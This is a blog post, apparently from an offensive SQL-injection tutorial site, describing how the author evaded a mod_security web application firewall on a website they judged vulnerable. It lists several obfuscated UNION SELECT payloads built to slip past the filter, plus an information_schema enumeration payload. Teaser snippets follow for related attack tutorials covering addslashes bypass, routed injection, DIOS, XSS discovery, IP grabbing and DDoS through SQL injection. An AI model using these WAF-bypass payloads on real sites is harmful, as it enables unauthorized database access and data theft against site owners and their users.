How to bypass mod_security (WAF)

Hello, this time I would like to share with you how to evade the WAF mod_security.

Looking for vulnerable pages I came across a website that, after spending a little time on it, I realized that it could be vulnerable to sql injections, then I realized that it was “protected” with mod_security and decided to see if I could skip the waf.

I share how I did it …

sql injection to bypass Mod_Security

sql injection + bypass Mod_Security

/*!50000un0x696fn*/+/*!12345AlL*/(/*!50000se0x6c65ct*/+1)

/*!50000%75%6e%69on*/ %73%65%6cect 1

/*!12345UnioN*//**/(/*!12345seLECT*//**/1)

/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)

Create encoded sql payloads

In this part I would like to give an example of how to create an encoded payload. First we are going to define the payload that we want to encode: union select 1,2,3,concat(table_name),5 from information_schema.tables table_schema = database() this case we are using the payload without any coding, but we have more ways to declare…

Bypass Addslashes using Multibyte Character

I beleive this tutorial is nother unique or new as compared to other tutorials on Securityidiots. Tutorial related to Addslash bypass can be found easily, but as we are trying to make securityidiots a portal having every shit about SQLi. So this too is worth posting 🙂 . Lets Start Our Tutorial With Little Bit…

Routed SQL Injection

Routed SQL Injection may sound a little bit different or tough for many of the injector being a new concept which confuse many of the injectors. Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives…

DIOS the SQL Injectors Weapon

In this Post we will only know DIOS a little more and introduce some different and new flavors of DIOS. USAGE FOR ALL DIOS: Just put the code in place of vulnerable column and see the magic As most of you have seen this one the first DIOS: Above is a Awesome Piece of code…

How to find AngularJS XSS

Have you ever heard about publicwww? It’s a search engine for source code. So publicwww will fnd any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code. They have this list that you can search for: AdvertisingMarketingAnalyticsTechnologiesFrontendWidgetsCMS You can find it here https://publicwww.com. They also have plans and pricing if…

Steal IP Address using Image

Starting on the name of My god “Allah” the most beneficent the most merciful Today i wokeup and saw a post on grabbing the IP using SQL injection. As per my interest i checked what it was, after reading it i came up with an idea to include some htaccess shit with the whole idea…

DDOS Using SQL injection (SiDDOS)

DDOS Using SQL injection In this tutorial we will discuss how can some one DDOS a website using SQL injection. As for me its a new concept dint had much research or tutorials on it. After my own testing and the maximum information i some how collected reading SQL syntax and other limitations on connection and…